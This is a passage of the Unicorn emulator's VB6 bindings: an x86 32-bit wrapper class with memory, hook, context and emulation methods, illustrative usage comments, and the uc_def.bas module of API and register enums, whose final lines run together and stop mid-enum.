            hLib = LoadLibrary(GetParentFolder(UNICORN_PATH) & "\" & dllName)
            If hLib = 0 Then
                hLib = LoadLibrary(dllName)
                If hLib = 0 Then
                    errMsg = "Could not load " & dllName
                    Exit Sub
                End If
            End If
        End If
    End If

    If DYNLOAD = 0 Then
        DYNLOAD = ucs_dynload(UNICORN_PATH)
        If DYNLOAD = 0 Then
            errMsg = "Dynamic Loading of unicorn.dll failed " & IIf(Len(UNICORN_PATH) > 0, "path: " & UNICORN_PATH, "")
            Exit Sub
        End If
    End If

    ucs_version major, minor
    Version = major & "." & minor

    If ucs_arch_supported(UC_ARCH_X86) <> 1 Then
        errMsg = "UC_ARCH_X86 not supported"
        Exit Sub
    End If

    e = ucs_open(UC_ARCH_X86, UC_MODE_32, uc)
    If e <> uc_err_ok Then
        errMsg = "Failed to create new x86 32bit engine instance " & err2str(e)
        Exit Sub
    End If

    If GetProcAddress(hLib, "disasm_addr") <> 0 Then m_DisasmOk = True

    instances.Add Me, "objptr:" & ObjPtr(Me)

End Sub

Private Sub Class_Terminate()
    If uc = 0 Then Exit Sub
    stopEmu
    ucs_close uc
    On Error Resume Next
    instances.Remove "objptr:" & ObjPtr(Me)
End Sub

Function mapMem(address As Long, size As Long, Optional protection As uc_prot = UC_PROT_ALL) As Boolean

    Dim addr As Currency
    Dim e As uc_err

    errMsg = Empty
    addr = lng2Cur(address)

    e = ucs_mem_map(uc, addr, size, protection)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    mapMem = True

End Function
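'---- usage note (sketch added for illustration; addresses are the sample defaults, ----
'---- toBytes() comes from the support module)                                      ----
'map, write and run a few opcodes end to end:
'   Dim uc32 As New ucIntel32
'   Dim sc() As Byte
'   sc = toBytes("\x40\x41\x4a")                      'inc eax / inc ecx / dec edx
'   If Not uc32.writeBlock(&H1000000, sc) Then Debug.Print uc32.errMsg
'   uc32.reg32(eax_r) = 5
'   uc32.startEmu &H1000000, &H1000000 + UBound(sc) + 1
'   Debug.Print uc32.regDump()                        'eax=6  ecx=1  edx=FFFFFFFF ...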
'address and size must be 4kb aligned, real buffer must be at least of size, and not go out of scope!
Function mapMemPtr(ByRef b() As Byte, address As Long, size As Long, Optional protection As uc_prot = UC_PROT_ALL) As Boolean

    Dim addr As Currency
    Dim e As uc_err

    errMsg = Empty
    addr = lng2Cur(address)

    If UBound(b) < size Then
        errMsg = "Buffer is < size"
        Exit Function
    End If

    If size Mod &H1000 <> 0 Then
        errMsg = "Size must be 4kb aligned"
        Exit Function
    End If

    If address Mod &H1000 <> 0 Then
        errMsg = "address must be 4kb aligned"
        Exit Function
    End If

    e = ucs_mem_map_ptr(uc, addr, size, protection, VarPtr(b(0)))
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    mapMemPtr = True

End Function

Function findAlloc(address As Long, Optional inRange As Boolean = False) As CMemRegion

    Dim m As CMemRegion
    Dim found As Boolean

    For Each m In getMemMap()
        If inRange Then
            'in range means anywhere between the region start and its last byte
            If ULong(address, m.address, op_gteq) = 1 And ULong(address, m.endsAt, op_lteq) = 1 Then found = True
        Else
            If m.address = address Then found = True
        End If
        If found Then
            Set findAlloc = m
            Exit Function
        End If
    Next

End Function

'we could accept a variant here instead of CMemRegion
'if typename(v) = "Long" then enum regions and find cmem, else expect CMemRegion..
'would be convenient.. or a findAlloc(base as long) as CMemRegion
Function changePermissions(m As CMemRegion, newProt As uc_prot)

    Dim e As uc_err
    Dim addr64 As Currency

    errMsg = Empty
    If m Is Nothing Then Exit Function

    If newProt = m.perm Then
        changePermissions = True
        Exit Function
    End If

    addr64 = lng2Cur(m.address)

    e = ucs_mem_protect(uc, addr64, m.size, newProt)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    m.perm = newProt
    changePermissions = True

End Function

Function unMapMem(base As Long) As Boolean

    Dim m As CMemRegion
    Dim e As uc_err
    Dim addr64 As Currency

    errMsg = Empty
    addr64 = lng2Cur(base)

    For Each m In getMemMap()
        If m.address = base Then
            e = ucs_mem_unmap(uc, addr64, m.size)
            unMapMem = (e = uc_err_ok)
            If Not unMapMem Then errMsg = err2str(e)
            Exit Function
        End If
    Next

End Function

'this function maps and writes (note 32bit only right now)
Function writeBlock(address As Long, buf() As Byte, Optional perm As uc_prot = UC_PROT_ALL) As Boolean

    Dim addr As Currency
    Dim e As uc_err

    addr = lng2Cur(address)
    errMsg = Empty

    e = mem_write_block(uc, addr, buf(0), UBound(buf) + 1, perm)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    writeBlock = True

End Function
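'---- usage note (sketch added for illustration; "uc32" as above) ----
'look a region up and drop its exec bit:
'   Dim m As CMemRegion
'   Set m = uc32.findAlloc(&H1000000)
'   If Not m Is Nothing Then uc32.changePermissions m, UC_PROT_READ Or UC_PROT_WRITE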
'this function requires the memory already be mapped in, use writeBlock for easier access...
Function writeMem(address As Long, buf() As Byte) As Boolean

    Dim addr As Currency
    Dim e As uc_err

    errMsg = Empty
    addr = lng2Cur(address)

    e = ucs_mem_write(uc, addr, buf(0), UBound(buf) + 1)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    writeMem = True

End Function

Function writeByte(address As Long, b As Byte) As Boolean

    Dim addr As Currency
    Dim e As uc_err
    Dim buf(0) As Byte

    errMsg = Empty
    addr = lng2Cur(address)
    buf(0) = b

    e = ucs_mem_write(uc, addr, buf(0), 1)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    writeByte = True

End Function

Function writeLong(address As Long, value As Long) As Boolean

    Dim addr As Currency
    Dim e As uc_err
    Dim buf(0 To 3) As Byte

    errMsg = Empty
    addr = lng2Cur(address)
    CopyMemory buf(0), ByVal VarPtr(value), 4

    e = ucs_mem_write(uc, addr, buf(0), 4)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    writeLong = True

End Function

Function writeInt(address As Long, value As Integer) As Boolean

    Dim addr As Currency
    Dim e As uc_err
    Dim buf(0 To 1) As Byte

    errMsg = Empty
    addr = lng2Cur(address)
    CopyMemory buf(0), ByVal VarPtr(value), 2

    e = ucs_mem_write(uc, addr, buf(0), 2)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    writeInt = True

End Function

Function readMem(address As Long, ByRef buf() As Byte, ByVal size As Long) As Boolean

    Dim addr As Currency
    Dim e As uc_err

    errMsg = Empty
    addr = lng2Cur(address)
    ReDim buf(size - 1) '0 based..

    e = ucs_mem_read(uc, addr, buf(0), UBound(buf) + 1)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    readMem = True

End Function

Function readByte(address As Long, ByRef b As Byte) As Boolean
    Dim buf() As Byte
    readMem address, buf, 1
    If hadErr Then Exit Function
    b = buf(0)
    readByte = True
End Function

Function readLong(address As Long, ByRef retVal As Long) As Boolean
    Dim buf() As Byte
    readMem address, buf, 4
    If hadErr Then Exit Function
    CopyMemory ByVal VarPtr(retVal), buf(0), 4
    readLong = True
End Function

Function readInt(address As Long, ByRef retVal As Integer) As Boolean
    Dim buf() As Byte
    readMem address, buf, 2
    If hadErr Then Exit Function
    CopyMemory ByVal VarPtr(retVal), buf(0), 2
    readInt = True
End Function

Function saveContext() As Long

    Dim hContext As Long
    Dim e As uc_err

    errMsg = Empty

    e = ucs_context_alloc(uc, hContext)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    e = ucs_context_save(uc, hContext)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        e = ucs_free(hContext)
        If e <> uc_err_ok Then errMsg = errMsg & " error freeing context: " & err2str(e)
        Exit Function
    End If

    saveContext = hContext

End Function

Function restoreContext(hContext As Long) As Boolean

    Dim e As uc_err

    errMsg = Empty

    e = ucs_context_restore(uc, hContext)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    restoreContext = True

End Function

Function freeContext(hContext As Long) As Boolean
    Dim e As uc_err
    e = ucs_free(hContext)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
    Else
        freeContext = True
    End If
End Function
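'---- usage note (sketch added for illustration; "uc32" as above) ----
'snapshot cpu state, run, then roll back:
'   Dim ctx As Long
'   ctx = uc32.saveContext()
'   uc32.startEmu &H1000000, &H1000003
'   uc32.restoreContext ctx
'   uc32.freeContext ctx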
Function disasm(va As Long, Optional ByRef instrLen As Long) As String

    Dim buf As String, i As Long, b() As Byte
    Dim dump As String

    On Error Resume Next

    If Not m_DisasmOk Then
        disasm = Right("00000000" & Hex(va), 8)
        Exit Function
    End If

    buf = String(300, Chr(0))
    instrLen = disasm_addr(uc, va, buf, Len(buf))

    If instrLen < 1 Then
        Select Case instrLen
            Case -1: buf = "Buffer too small"
            Case -2: buf = "Failed to read memory"
            Case -3: buf = "Failed to disassemble"
            Case Else: buf = "Unknown error " & instrLen
        End Select
        dump = "?? ?? ??"
        GoTo end_of_func
    End If

    i = InStr(buf, Chr(0))
    If i > 2 Then buf = VBA.Left(buf, i - 1) Else buf = Empty

    readMem va, b(), instrLen
    For i = 0 To UBound(b)
        dump = dump & hhex(b(i)) & " "
    Next

end_of_func:
    disasm = Right("00000000" & Hex(va), 8) & " " & rpad(dump, 25) & buf

End Function

Function startEmu(beginAt As Long, endAt As Long, Optional timeout As Long = 0, Optional count As Long = 0) As Boolean

    Dim e As uc_err
    Dim a As Currency, b As Currency, t As Currency

    a = lng2Cur(beginAt)
    b = lng2Cur(endAt)
    t = lng2Cur(timeout)

    errMsg = Empty

    e = ucs_emu_start(uc, a, b, t, count)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    startEmu = True

End Function

Function stopEmu() As Boolean

    Dim e As uc_err

    errMsg = Empty

    e = ucs_emu_stop(uc)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    stopEmu = True

End Function

Function addHook(catagory As hookCatagory, flags As uc_hook_type, Optional beginAt As Long = 1, Optional endAt As Long = 0) As Boolean

    Dim e As uc_err
    Dim hHook As Long 'handle to remove hook
    Dim a As Currency, b As Currency

    e = -1
    a = lng2Cur(beginAt)
    b = lng2Cur(endAt)
    errMsg = Empty

    If KeyExistsInCollection(hooks, "flags:" & flags) Then
        addHook = True
        Exit Function
    End If

    If catagory = hc_code Then e = ucs_hook_add(uc, hHook, flags, AddressOf code_hook, ObjPtr(Me), a, b, catagory)
    If catagory = hc_mem Then e = ucs_hook_add(uc, hHook, flags, AddressOf mem_hook, ObjPtr(Me), a, b, catagory)
    If catagory = hc_memInvalid Then e = ucs_hook_add(uc, hHook, flags, AddressOf invalid_mem_hook, ObjPtr(Me), a, b, catagory)
    If catagory = hc_block Then e = ucs_hook_add(uc, hHook, flags, AddressOf block_hook, ObjPtr(Me), a, b, catagory)
    If catagory = hc_int Then e = ucs_hook_add(uc, hHook, flags, AddressOf interrupt_hook, ObjPtr(Me), a, b, catagory)

    If e = -1 Then
        errMsg = "Unimplemented hook category"
        Exit Function
    End If

    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    hooks.Add hHook, "flags:" & flags
    addHook = True

End Function

'actually these appear to use different prototypes for each instruction? (only in/out examples seen...)
'what about all the others? not implemented yet in c or vb callback
'Function hookInstruction(i As uc_x86_insn, Optional beginAt As Long = 1, Optional endAt As Long = 0) As Boolean
'
'    Dim e As uc_err
'    Dim hHook As Long 'handle to remove hook
'    Dim a As Currency, b As Currency
'
'    If i = UC_X86_INS_INVALID Then Exit Function
'
'    e = -1
'    a = lng2Cur(beginAt)
'    b = lng2Cur(endAt)
'    errMsg = Empty
'
'    If KeyExistsInCollection(hooks, "instr:" & i) Then
'        hookInstruction = True
'        Exit Function
'    End If
'
'    e = ucs_hook_add(uc, hHook, UC_HOOK_INSN, AddressOf instruction_hook, ObjPtr(Me), a, b, hc_inst, i)
'
'    If e <> UC_ERR_OK Then
'        errMsg = err2str(e)
'        Exit Function
'    End If
'
'    hooks.Add hHook, "instr:" & i
'    hookInstruction = True
'
'End Function
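'---- usage note (sketch added for illustration; assumes the host declared ----
'---- "Private WithEvents uc32 As ucIntel32")                              ----
'let emulation continue past a fault by mapping the missing page from the event:
'   uc32.addHook hc_memInvalid, UC_HOOK_MEM_INVALID
'
'   Private Sub uc32_InvalidMem(ByVal t As uc_mem_type, ByVal address As Long, _
'                               ByVal size As Long, ByVal value As Long, ByRef continue As Boolean)
'       continue = uc32.mapMem(address And &HFFFFF000, &H1000) 'page align and retry
'   End Sub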
Function removeHook(ByVal flags As uc_hook_type) As Boolean
    On Error Resume Next

    Dim hHook As Long, e As uc_err, wasInstr As Boolean

    errMsg = Empty
    hHook = hooks("flags:" & flags)

    If hHook = 0 Then
        hHook = hooks("instr:" & flags) 'maybe it was an instruction hook?
        If hHook = 0 Then
            errMsg = "Hook handle not found for supplied flags."
            Exit Function
        Else
            wasInstr = True
        End If
    End If

    e = ucs_hook_del(uc, hHook)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    If wasInstr Then
        hooks.Remove "instr:" & flags
    Else
        hooks.Remove "flags:" & flags
    End If

    removeHook = True

End Function

Function getMemMap() As Collection 'of 32bit CMemRegion

    Dim c As New Collection
    Dim ret As New Collection
    Dim mem As CMemRegion
    Dim e As uc_err
    Dim s, tmp, v

    errMsg = Empty
    Set getMemMap = ret

    e = get_memMap(uc, c)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    For Each s In c '&h1000000,&h11fffff,&h7  these should always be 32bit safe values created in this class..
        If Len(s) > 0 Then
            tmp = Split(s, ",")
            If UBound(tmp) = 2 Then
                Set mem = New CMemRegion
                mem.address = CLng(tmp(0))
                mem.endsAt = CLng(tmp(1))
                mem.size = ULong(mem.endsAt, mem.address, op_sub) + 1 'vb native math is signed only..we play it safe..
                mem.perm = CLng(tmp(2))
                ret.Add mem
            End If
        End If
    Next

End Function

'these are internal functions used from the callback in the module to route the message to the event interface
'little confusing but in the end easier for the end user...also lays foundation for multiple live instances
'(although only one can run at a time since vb is single threaded)
Friend Function internal_invalid_mem_hook(ByVal t As uc_mem_type, ByVal address As Currency, ByVal size As Long, ByVal value As Currency) As Long
    Dim addr As Long, v As Long, continue As Boolean
    addr = cur2lng(address)
    v = cur2lng(value)
    RaiseEvent InvalidMem(t, addr, size, v, continue)
    internal_invalid_mem_hook = IIf(continue, 1, 0)
End Function

Friend Sub internal_mem_hook(ByVal t As uc_mem_type, ByVal address As Currency, ByVal size As Long, ByVal value As Currency)
    Dim addr As Long, v As Long
    addr = cur2lng(address)
    v = cur2lng(value)
    RaiseEvent MemAccess(t, addr, size, v)
End Sub

Friend Sub internal_code_hook(ByVal address As Currency, ByVal size As Long)
    Dim addr As Long
    addr = cur2lng(address)
    RaiseEvent CodeHook(addr, size)
End Sub

Friend Sub internal_block_hook(ByVal address As Currency, ByVal size As Long)
    Dim addr As Long
    addr = cur2lng(address)
    RaiseEvent BlockHook(addr, size)
End Sub

Friend Sub internal_interrupt_hook(ByVal intno As Long)
    RaiseEvent Interrupt(intno)
End Sub

unicorn-2.1.1/bindings/vb6/uc_def.bas

Attribute VB_Name = "uc_def"
Option Explicit

'Unicorn Engine x86 32bit wrapper class for vb6
'Contributed by: FireEye FLARE team
'Author: David Zimmer <david.zimmer@fireeye.com>, <dzzie@yahoo.com>
'License: Apache 2.0

' supported api:
'    ucs_version
'    ucs_arch_supported
'    ucs_open
'    ucs_close
'    uc_reg_write
'    uc_reg_read
'    uc_mem_write
'    UC_MEM_READ
'    uc_emu_start
'    uc_emu_stop
'    ucs_hook_add
'    uc_mem_map
'    uc_hook_del
'    uc_mem_regions
'    uc_mem_map_ptr
'    uc_context_alloc
'    uc_free
'    uc_context_save
'    uc_context_restore
'    uc_mem_unmap
'    uc_mem_protect
'    uc_strerror
'    uc_errno
'
' supported hooks:
'    UC_HOOK_CODE
'    UC_HOOK_BLOCK
'    memory READ/WRITE/FETCH
'    invalid memory access
'    interrupts
'
' bonus:
'    disasm_addr (32bit only uses libdasm)
'    mem_write_block (map and write data auto handles alignment)
'    get_memMap (wrapper for uc_mem_regions)
'
'sample supports multiple instances, required since callbacks must be in a shared module

Global instances As New Collection
Global UNICORN_PATH As String
Global DYNLOAD As Long

Public Enum uc_arch
    UC_ARCH_ARM = 1     ' ARM architecture (including Thumb, Thumb-2)
    UC_ARCH_ARM64 = 2   ' ARM-64, also called AArch64
    UC_ARCH_MIPS = 3    ' Mips architecture
    UC_ARCH_X86 = 4     ' X86 architecture (including x86 & x86-64)
    UC_ARCH_PPC = 5     ' PowerPC architecture (currently unsupported)
    UC_ARCH_SPARC = 6   ' Sparc architecture
    UC_ARCH_M68K = 7    ' M68K architecture
    UC_ARCH_RISCV = 8   ' RISCV architecture
    UC_ARCH_MAX = 9
End Enum

Public Enum uc_prot
    UC_PROT_NONE = 0
    UC_PROT_READ = 1
    UC_PROT_WRITE = 2
    UC_PROT_EXEC = 4
    UC_PROT_ALL = 7
End Enum

Public Enum uc_err
    uc_err_ok = 0                ' No error: everything was fine
    UC_ERR_NOMEM = 1             ' Out-Of-Memory error: uc_open(), uc_emulate()
    UC_ERR_ARCH = 2              ' Unsupported architecture: uc_open()
    UC_ERR_HANDLE = 3            ' Invalid handle
    UC_ERR_MODE = 4              ' Invalid/unsupported mode: uc_open()
    UC_ERR_VERSION = 5           ' Unsupported version (bindings)
    UC_ERR_READ_UNMAPPED = 6     ' Quit emulation due to READ on unmapped memory: uc_emu_start()
    UC_ERR_WRITE_UNMAPPED = 7    ' Quit emulation due to WRITE on unmapped memory: uc_emu_start()
    UC_ERR_FETCH_UNMAPPED = 8    ' Quit emulation due to FETCH on unmapped memory: uc_emu_start()
    UC_ERR_HOOK = 9              ' Invalid hook type: uc_hook_add()
    UC_ERR_INSN_INVALID = 10     ' Quit emulation due to invalid instruction: uc_emu_start()
    UC_ERR_MAP = 11              ' Invalid memory mapping: uc_mem_map()
    UC_ERR_WRITE_PROT = 12       ' Quit emulation due to UC_MEM_WRITE_PROT violation: uc_emu_start()
    UC_ERR_READ_PROT = 13        ' Quit emulation due to UC_MEM_READ_PROT violation: uc_emu_start()
    UC_ERR_FETCH_PROT = 14       ' Quit emulation due to UC_MEM_FETCH_PROT violation: uc_emu_start()
    UC_ERR_ARG = 15              ' Invalid argument provided to uc_xxx function (See specific function API)
    UC_ERR_READ_UNALIGNED = 16   ' Unaligned read
    UC_ERR_WRITE_UNALIGNED = 17  ' Unaligned write
    UC_ERR_FETCH_UNALIGNED = 18  ' Unaligned fetch
    UC_ERR_HOOK_EXIST = 19       ' hook for this event already existed
    UC_ERR_RESOURCE = 20         ' Insufficient resource: uc_emu_start()
    UC_ERR_EXCEPTION = 21        ' Unhandled CPU exception
End Enum

' All type of memory accesses for UC_HOOK_MEM_*
Public Enum uc_mem_type
    UC_MEM_READ = 16            ' Memory is read from
    uc_mem_write = 17           ' Memory is written to
    UC_MEM_FETCH = 18           ' Memory is fetched
    UC_MEM_READ_UNMAPPED = 19   ' Unmapped memory is read from
    UC_MEM_WRITE_UNMAPPED = 20  ' Unmapped memory is written to
    UC_MEM_FETCH_UNMAPPED = 21  ' Unmapped memory is fetched
    UC_MEM_WRITE_PROT = 22      ' Write to write protected, but mapped, memory
    UC_MEM_READ_PROT = 23       ' Read from read protected, but mapped, memory
    UC_MEM_FETCH_PROT = 24      ' Fetch from non-executable, but mapped, memory
    UC_MEM_READ_AFTER = 25      ' Memory is read from (successful access)
End Enum

Public Enum uc_mode 'from /bindings/dotnet/common.fs
    UC_MODE_LITTLE_ENDIAN = 0         'little-endian mode (default mode)
    UC_MODE_BIG_ENDIAN = 1073741824   'big-endian mode
'    UC_MODE_ARM = 0                  'ARM mode
'    UC_MODE_THUMB = 16               'THUMB mode (including Thumb-2)
'    UC_MODE_MCLASS = 32              'ARM's Cortex-M series (currently unsupported)
'    UC_MODE_V8 = 64                  'ARMv8 A32 encodings for ARM (currently unsupported)
'    UC_MODE_MICRO = 16               'MicroMips mode (currently unsupported)
'    UC_MODE_MIPS3 = 32               'Mips III ISA (currently unsupported)
'    UC_MODE_MIPS32R6 = 64            'Mips32r6 ISA (currently
unsupported) ' UC_MODE_MIPS32 = 4 'Mips32 ISA ' UC_MODE_MIPS64 = 8 'Mips64 ISA UC_MODE_16 = 2 '16-bit mode UC_MODE_32 = 4 '32-bit mode UC_MODE_64 = 8 '64-bit mode ' UC_MODE_PPC32 = 4 '32-bit mode (currently unsupported) ' UC_MODE_PPC64 = 8 '64-bit mode (currently unsupported) ' UC_MODE_QPX = 16 'Quad Processing eXtensions mode (currently unsupported) ' UC_MODE_SPARC32 = 4 '32-bit mode ' UC_MODE_SPARC64 = 8 '64-bit mode ' UC_MODE_V9 = 16 'SparcV9 mode (currently unsupported) ' UC_MODE_RISCV32 = 4 '32-bit mode ' UC_MODE_RISCV64 = 8 '64-bit mode End Enum Public Enum uc_hook_type 'from /bindings/dotnet/common.fs UC_HOOK_INTR = 1 ' Hook all interrupt/syscall events UC_HOOK_INSN = 2 ' Hook a particular instruction UC_HOOK_CODE = 4 ' Hook a range of code UC_HOOK_BLOCK = 8 ' Hook basic blocks UC_HOOK_MEM_READ_UNMAPPED = 16 ' Hook for memory read on unmapped memory UC_HOOK_MEM_WRITE_UNMAPPED = 32 ' Hook for invalid memory write events UC_HOOK_MEM_FETCH_UNMAPPED = 64 ' Hook for invalid memory fetch for execution events UC_HOOK_MEM_READ_PROT = 128 ' Hook for memory read on read-protected memory UC_HOOK_MEM_WRITE_PROT = 256 ' Hook for memory write on write-protected memory UC_HOOK_MEM_FETCH_PROT = 512 ' Hook for memory fetch on non-executable memory UC_HOOK_MEM_READ = 1024 ' Hook memory read events. UC_HOOK_MEM_WRITE = 2048 ' Hook memory write events. UC_HOOK_MEM_FETCH = 4096 ' Hook memory fetch for execution events UC_HOOK_MEM_READ_AFTER = 8192 ' Hook memory read events, but only successful access.(triggered after successful read.) UC_HOOK_MEM_UNMAPPED = 112 UC_HOOK_MEM_PROT = 896 UC_HOOK_MEM_READ_INVALID = 144 UC_HOOK_MEM_WRITE_INVALID = 288 UC_HOOK_MEM_FETCH_INVALID = 576 UC_HOOK_MEM_INVALID = 1008 UC_HOOK_MEM_VALID = 7168 End Enum Public Enum hookCatagory hc_code = 0 hc_block = 1 hc_inst = 2 hc_int = 3 hc_mem = 4 hc_memInvalid = 5 End Enum Public Enum uc_x86_reg UC_X86_REG_INVALID = 0 UC_X86_REG_AH = 1 UC_X86_REG_AL = 2 UC_X86_REG_AX = 3 UC_X86_REG_BH = 4 UC_X86_REG_Bl = 5 UC_X86_REG_BP = 6 UC_X86_REG_BPL = 7 UC_X86_REG_BX = 8 UC_X86_REG_CH = 9 UC_X86_REG_CL = 10 UC_X86_REG_CS = 11 UC_X86_REG_CX = 12 UC_X86_REG_DH = 13 UC_X86_REG_DI = 14 UC_X86_REG_DIL = 15 UC_X86_REG_DL = 16 UC_X86_REG_DS = 17 UC_X86_REG_DX = 18 UC_X86_REG_EAX = 19 UC_X86_REG_EBP = 20 UC_X86_REG_EBX = 21 UC_X86_REG_ECX = 22 UC_X86_REG_EDI = 23 UC_X86_REG_EDX = 24 UC_X86_REG_EFLAGS = 25 UC_X86_REG_EIP = 26 UC_X86_REG_EIZ = 27 UC_X86_REG_ES = 28 UC_X86_REG_ESI = 29 UC_X86_REG_ESP = 30 UC_X86_REG_FPSW = 31 UC_X86_REG_FS = 32 UC_X86_REG_GS = 33 UC_X86_REG_IP = 34 UC_X86_REG_RAX = 35 UC_X86_REG_RBP = 36 UC_X86_REG_RBX = 37 UC_X86_REG_RCX = 38 UC_X86_REG_RDI = 39 UC_X86_REG_RDX = 40 UC_X86_REG_RIP = 41 UC_X86_REG_RIZ = 42 UC_X86_REG_RSI = 43 UC_X86_REG_RSP = 44 UC_X86_REG_SI = 45 UC_X86_REG_SIL = 46 UC_X86_REG_SP = 47 UC_X86_REG_SPL = 48 UC_X86_REG_SS = 49 UC_X86_REG_CR0 = 50 UC_X86_REG_CR1 = 51 UC_X86_REG_CR2 = 52 UC_X86_REG_CR3 = 53 UC_X86_REG_CR4 = 54 UC_X86_REG_CR5 = 55 UC_X86_REG_CR6 = 56 UC_X86_REG_CR7 = 57 UC_X86_REG_CR8 = 58 UC_X86_REG_CR9 = 59 UC_X86_REG_CR10 = 60 UC_X86_REG_CR11 = 61 UC_X86_REG_CR12 = 62 UC_X86_REG_CR13 = 63 UC_X86_REG_CR14 = 64 UC_X86_REG_CR15 = 65 UC_X86_REG_DR0 = 66 UC_X86_REG_DR1 = 67 UC_X86_REG_DR2 = 68 UC_X86_REG_DR3 = 69 UC_X86_REG_DR4 = 70 UC_X86_REG_DR5 = 71 UC_X86_REG_DR6 = 72 UC_X86_REG_DR7 = 73 UC_X86_REG_DR8 = 74 UC_X86_REG_DR9 = 75 UC_X86_REG_DR10 = 76 UC_X86_REG_DR11 = 77 UC_X86_REG_DR12 = 78 UC_X86_REG_DR13 = 79 UC_X86_REG_DR14 = 80 UC_X86_REG_DR15 = 81 UC_X86_REG_FP0 = 82 UC_X86_REG_FP1 = 83 
UC_X86_REG_FP2 = 84 UC_X86_REG_FP3 = 85 UC_X86_REG_FP4 = 86 UC_X86_REG_FP5 = 87 UC_X86_REG_FP6 = 88 UC_X86_REG_FP7 = 89 UC_X86_REG_K0 = 90 UC_X86_REG_K1 = 91 UC_X86_REG_K2 = 92 UC_X86_REG_K3 = 93 UC_X86_REG_K4 = 94 UC_X86_REG_K5 = 95 UC_X86_REG_K6 = 96 UC_X86_REG_K7 = 97 UC_X86_REG_MM0 = 98 UC_X86_REG_MM1 = 99 UC_X86_REG_MM2 = 100 UC_X86_REG_MM3 = 101 UC_X86_REG_MM4 = 102 UC_X86_REG_MM5 = 103 UC_X86_REG_MM6 = 104 UC_X86_REG_MM7 = 105 UC_X86_REG_R8 = 106 UC_X86_REG_R9 = 107 UC_X86_REG_R10 = 108 UC_X86_REG_R11 = 109 UC_X86_REG_R12 = 110 UC_X86_REG_R13 = 111 UC_X86_REG_R14 = 112 UC_X86_REG_R15 = 113 UC_X86_REG_ST0 = 114 UC_X86_REG_ST1 = 115 UC_X86_REG_ST2 = 116 UC_X86_REG_ST3 = 117 UC_X86_REG_ST4 = 118 UC_X86_REG_ST5 = 119 UC_X86_REG_ST6 = 120 UC_X86_REG_ST7 = 121 UC_X86_REG_XMM0 = 122 UC_X86_REG_XMM1 = 123 UC_X86_REG_XMM2 = 124 UC_X86_REG_XMM3 = 125 UC_X86_REG_XMM4 = 126 UC_X86_REG_XMM5 = 127 UC_X86_REG_XMM6 = 128 UC_X86_REG_XMM7 = 129 UC_X86_REG_XMM8 = 130 UC_X86_REG_XMM9 = 131 UC_X86_REG_XMM10 = 132 UC_X86_REG_XMM11 = 133 UC_X86_REG_XMM12 = 134 UC_X86_REG_XMM13 = 135 UC_X86_REG_XMM14 = 136 UC_X86_REG_XMM15 = 137 UC_X86_REG_XMM16 = 138 UC_X86_REG_XMM17 = 139 UC_X86_REG_XMM18 = 140 UC_X86_REG_XMM19 = 141 UC_X86_REG_XMM20 = 142 UC_X86_REG_XMM21 = 143 UC_X86_REG_XMM22 = 144 UC_X86_REG_XMM23 = 145 UC_X86_REG_XMM24 = 146 UC_X86_REG_XMM25 = 147 UC_X86_REG_XMM26 = 148 UC_X86_REG_XMM27 = 149 UC_X86_REG_XMM28 = 150 UC_X86_REG_XMM29 = 151 UC_X86_REG_XMM30 = 152 UC_X86_REG_XMM31 = 153 UC_X86_REG_YMM0 = 154 UC_X86_REG_YMM1 = 155 UC_X86_REG_YMM2 = 156 UC_X86_REG_YMM3 = 157 UC_X86_REG_YMM4 = 158 UC_X86_REG_YMM5 = 159 UC_X86_REG_YMM6 = 160 UC_X86_REG_YMM7 = 161 UC_X86_REG_YMM8 = 162 UC_X86_REG_YMM9 = 163 UC_X86_REG_YMM10 = 164 UC_X86_REG_YMM11 = 165 UC_X86_REG_YMM12 = 166 UC_X86_REG_YMM13 = 167 UC_X86_REG_YMM14 = 168 UC_X86_REG_YMM15 = 169 UC_X86_REG_YMM16 = 170 UC_X86_REG_YMM17 = 171 UC_X86_REG_YMM18 = 172 UC_X86_REG_YMM19 = 173 UC_X86_REG_YMM20 = 174 UC_X86_REG_YMM21 = 175 UC_X86_REG_YMM22 = 176 UC_X86_REG_YMM23 = 177 UC_X86_REG_YMM24 = 178 UC_X86_REG_YMM25 = 179 UC_X86_REG_YMM26 = 180 UC_X86_REG_YMM27 = 181 UC_X86_REG_YMM28 = 182 UC_X86_REG_YMM29 = 183 UC_X86_REG_YMM30 = 184 UC_X86_REG_YMM31 = 185 UC_X86_REG_ZMM0 = 186 UC_X86_REG_ZMM1 = 187 UC_X86_REG_ZMM2 = 188 UC_X86_REG_ZMM3 = 189 UC_X86_REG_ZMM4 = 190 UC_X86_REG_ZMM5 = 191 UC_X86_REG_ZMM6 = 192 UC_X86_REG_ZMM7 = 193 UC_X86_REG_ZMM8 = 194 UC_X86_REG_ZMM9 = 195 UC_X86_REG_ZMM10 = 196 UC_X86_REG_ZMM11 = 197 UC_X86_REG_ZMM12 = 198 UC_X86_REG_ZMM13 = 199 UC_X86_REG_ZMM14 = 200 UC_X86_REG_ZMM15 = 201 UC_X86_REG_ZMM16 = 202 UC_X86_REG_ZMM17 = 203 UC_X86_REG_ZMM18 = 204 UC_X86_REG_ZMM19 = 205 UC_X86_REG_ZMM20 = 206 UC_X86_REG_ZMM21 = 207 UC_X86_REG_ZMM22 = 208 UC_X86_REG_ZMM23 = 209 UC_X86_REG_ZMM24 = 210 UC_X86_REG_ZMM25 = 211 